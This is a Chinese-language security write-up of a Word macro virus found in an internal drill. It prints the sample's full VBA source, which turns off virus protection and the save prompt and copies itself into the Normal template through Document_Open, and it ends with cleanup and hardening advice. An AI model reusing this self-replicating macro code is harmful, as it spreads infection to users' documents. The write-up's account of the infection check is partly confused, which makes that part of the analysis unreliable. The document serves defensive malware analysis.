记一次宏病毒分析

01 事件背景介绍

某内部应急演练中，安全部门在终端防护软件中发现宏病毒告警，现需根据样本文件进行分析。

02 事件分析过程

对样本文件进行云沙箱病毒检测，检测结果如下：

在线云沙箱检测发现该文件属于宏病毒文件，该病毒由ThisDocument的模块组成，它使用Document_Open宏，Document_Close 宏和Document_New宏进行感染。它会感染WORD的通用模版（normal.dot）文件。

'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next  
   Application.DisplayStatusBar = False   不显示状态栏，防止显示宏的运行状态
   Options.VirusProtection = False   关闭病毒保护功能
   Options.SaveNormalPrompt = False   如果共用模板被修改，不显示提示窗口，直接保存
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then 判断感染标志
          .DeleteLines 1, .CountOfLines   删除目标文件的所有代码
          .InsertLines 1, MyCode   向目标文件嵌入宏代码
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName   保存文档
       End If
   End With
End Sub

根据上述代码分析，当带有该宏代码的文档被打开后，会检查模板文件是否已经受到 APMP 病毒感染。如果已经感染，则删除公用模板中的旧代码，将新的恶意代码插入模板中并保存。如果文档未被感染，则不会发生任何事情。

宏代码中对Normal.dotm通用模版文件操作记录见下图：

通过上述行为综合分析，该宏代码的核心逻辑为检查模版是否被感染，如果被感染则进行替换，无其余明显的恶意行为。

03 事件分析结果

该宏代码的核心逻辑为检查模版是否被感染，如果被感染则进行替换，无其余明显的恶意行为。

04 安全加固建议

1、处置建议：删除dotm模板文件（默认文件路径为：C：\Users\Administrator\AppData\Roaming\Microsoft\Templates\normal.dotm）后重启Word，或重新安装Word；使用终端杀毒软件进行全盘查杀，清除感染文档；设置宏安全级别为非常高，防止除Word默认的宏以外的其他宏运行；设置取消“信任所有安全的加载项和模板”，设置完毕后打开带有宏的Word文档时，会禁用宏。

2、提高安全意识：当网上下载资源、接收到别人发送的文件时，首先应有可能存在带毒文件的防范意识。不能直接打开或执行，而应先对文件进行扫描，确认文件无问题才可使用。